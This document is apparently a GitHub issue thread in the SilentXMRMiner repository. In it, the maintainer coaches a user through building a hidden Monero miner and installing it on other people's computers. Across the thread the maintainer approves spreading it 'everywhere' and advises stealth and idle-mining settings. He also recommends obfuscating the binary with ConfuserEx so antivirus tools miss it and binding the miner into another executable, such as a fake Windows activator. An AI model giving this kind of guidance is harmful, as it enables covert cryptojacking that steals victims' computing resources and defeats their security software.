### ISSUE TITLE
Cant run the program builder

### ISSUE THREAD

**Issue by adamix123** [UnamSanctam/SilentXMRMiner#59]
Where is the builder in the files ? I just downloaded latest version but cant find/exec it.

**Comment by UnamSanctam** [comment]
You can download pre-compiled versions here: https://github.com/UnamSanctam/SilentXMRMiner/releases

**Comment by adamix123** [comment]
Okay i am testing it, i just check Disabled if i want to just test it right ? i can disable it after in task manager.

**Comment by UnamSanctam** [comment]
Yes you don't need to touch the "Install" tab at all since it's disabled from the start. Then you can just turn off the miner in the Task Manager and it will be fully gone.

**Comment by adamix123** [comment]
I typed random numbers on pool and wallet adress. Builded exe but nothing happens.

**Comment by UnamSanctam** [comment]
What exactly do you mean by nothing happens? When you start the program after it's been built it shouldn't show anything since everything is hidden. It won't use any CPU since it won't be able to connect to a pool since you didn't enter one.

**Comment by adamix123** [comment]
Sorry for stupid question but i cant find Wallet Adress/User on minergate, do u know how can i find it there ?

**Comment by UnamSanctam** [comment]
Well I've never used MinerGate but I'm pretty sure they use your email as the wallet address/user.

**Comment by adamix123** [comment]
Thats amazing it works. Now i can just Enable Install and i can spread it everywhere right ? :D

**Comment by UnamSanctam** [comment]
Yes and you should probably enable settings like Stealth and Idle mining and things like that as well.

**Comment by adamix123** [comment]
I will donate you once i make some moneros for sure. You are amazing

**Comment by UnamSanctam** [comment]
Thank you, good luck and feel free to ask me any other questions if you have any

**Comment by adamix123** [comment]
> 
> 
> Thank you, good luck and feel free to ask me any other questions if you have any

just installed it 30mins ago on one pc , it started very good but now i see it offline...and his pc is still ON..do u know why?

**Comment by UnamSanctam** [comment]
Well there could be several reasons, is his Task Manager open or anything?

**Comment by adamix123** [comment]
well it is offline for 10-15 minutes so i dont think he has open task manager

**Comment by adamix123** [comment]
he is playing game...and offline worker

**Comment by UnamSanctam** [comment]
How much CPU did you set?

**Comment by adamix123** [comment]
50% of cpu

**Comment by adamix123** [comment]
Install enabled , cpu mining ON, Idle Mining ON, Stealth ON , MAX CPU 50%, Idle CPU 0%, idle wait 15minutes,

**Comment by UnamSanctam** [comment]
Well there could be two things which might disconnect it, either his explorer crashed and restarted (happens sometimes in Windows) or he has Task Manager currently open.

Also the Max CPU is the amount of CPU the miner uses while the computer is in use and Idle CPU is how much CPU it uses when the computer is not in use. I usually set something between 20-40% Max CPU and 60-80% Idle CPU.

A good recommendation to do as well is to obfuscate the built miner file so that antiviruses has a harder time detecting it, personally I have been testing the ConfuserEx (2) .NET Obfuscator and it's working well for me, if you want to try it you can download it here https://github.com/mkaring/ConfuserEx and then load this project https://anonfiles.com/zct9ieJdpe/SilentXMRMiner2_crproj and then add your file by dragging it in on the first tab and then press protect in the Protect tab, you will then get an obfuscated file inside the Confused folder.

**Comment by adamix123** [comment]
ufff okay i ll try to do it. Thanks ;)

**Comment by adamix123** [comment]
> 
> 
> Well there could be two things which might disconnect it, either his explorer crashed and restarted (happens sometimes in Windows) or he has Task Manager currently open.
> 
> Also the Max CPU is the amount of CPU the miner uses while the computer is in use and Idle CPU is how much CPU it uses when the computer is not in use. I usually set something between 20-40% Max CPU and 60-80% Idle CPU.
> 
> A good recommendation to do as well is to obfuscate the built miner file so that antiviruses has a harder time detecting it, personally I have been testing the ConfuserEx (2) .NET Obfuscator and it's working well for me, if you want to try it you can download it here https://github.com/mkaring/ConfuserEx and then load this project https://anonfiles.com/zct9ieJdpe/SilentXMRMiner2_crproj and then add your file by dragging it in on the first tab and then press protect in the Protect tab, you will then get an obfuscated file inside the Confused folder.

that anonfiles silentXMRMiner2_crproj link doesnt work, when i press download it doesnt work, does it work for u?

**Comment by UnamSanctam** [comment]
Yes, try using another browser and see if it downloads.

**Comment by adamix123** [comment]
> 
> 
> Yes, try using another browser and see if it downloads.

got that confuserEx but there is no exe file. How can i run it ? sorry for many questions

**Comment by UnamSanctam** [comment]
If you download the ConfuserEx-GUI it will have a ConfuserEx-GUI.exe file inside it. It's not a txt but you might as well treat is as one.

**Comment by adamix123** [comment]
> 
> 
> If you download the ConfuserEx-GUI it will have a ConfuserEx-GUI.exe file inside it. It's not a txt but you might as well treat is as one.

i am searching it...i downloaded that Confuser what you linked but there is no .exe file. I am really sorry but i cant find it....maybe i need compiled version ?

**Comment by UnamSanctam** [comment]
Yes always download the compiled version unless you're trying to compile it yourself. Pre-compiled version can almost always be found by pressing Releases on the right hand side.

**Comment by adamix123** [comment]
Defender should be always off right ?

**Comment by UnamSanctam** [comment]
If it's obfuscated then most antiviruses won't detect it for quite a while.

**Comment by adamix123** [comment]
I ve set it on 50% in usage and 70% on idle CPU, i have 5 workers and i have only 1.5kh/s, it is quite small number nope? How can i achieve mh/s ?

**Comment by UnamSanctam** [comment]
Depends on what kind of CPU they have, if they have low end CPUs it will naturally mine slower. On my computer 50% would be about 1.5 kH/s while other CPUs have a lot lower hashrate.

**Comment by adamix123** [comment]
> Depends on what kind of CPU they have, if they have low end CPUs it will naturally mine slower. On my computer 50% would be about 1.5 kH/s while other CPUs have a lot lower hashrate.

So if i want to achieve megahashes i have to choose gpu right?

**Comment by UnamSanctam** [comment]
No CPU is generally faster than GPU with the "new" RandomX algorithm although GPU mining  is still possible. To reach higher hashrates you should get more miners or miners with better CPUs. The real good CPUs can get up to 40000 H/s at 100%.

**Comment by adamix123** [comment]
I know many suspects with rtx 2080 super, their card can make 40-50 Megahash/S, if i can set like 40% of their GPU to mine...i can have from one guy 10-15 megahashes....why do we use CPU than ? can we achieve this number from cpus also ?

**Comment by adamix123** [comment]
Or is it different with mining monero ?

**Comment by UnamSanctam** [comment]
Those are hashrates for other algorithms, you can search for Monero benchmarks online.

**Comment by adamix123** [comment]
I obfuscated it today by your guide, it is amazing...your support is huge..

**Comment by adamix123** [comment]
is it possible to hide this .exe file into something ? like.... windows 10 activator or some random .exe file that i choose

**Comment by UnamSanctam** [comment]
If you mean that you first want to start the miner file together with another program then you can use a file binder.

**Comment by adamix123** [comment]
Do you know any file binder that is safe to use?since there are tons of scams on the internet.

**Comment by UnamSanctam** [comment]
Well I don't really use any myself but things like https://github.com/bytecode77/pe-union, https://bytecode77.com/pe-union can be used to bind files together.

**Comment by adamix123** [comment]
Thankssss
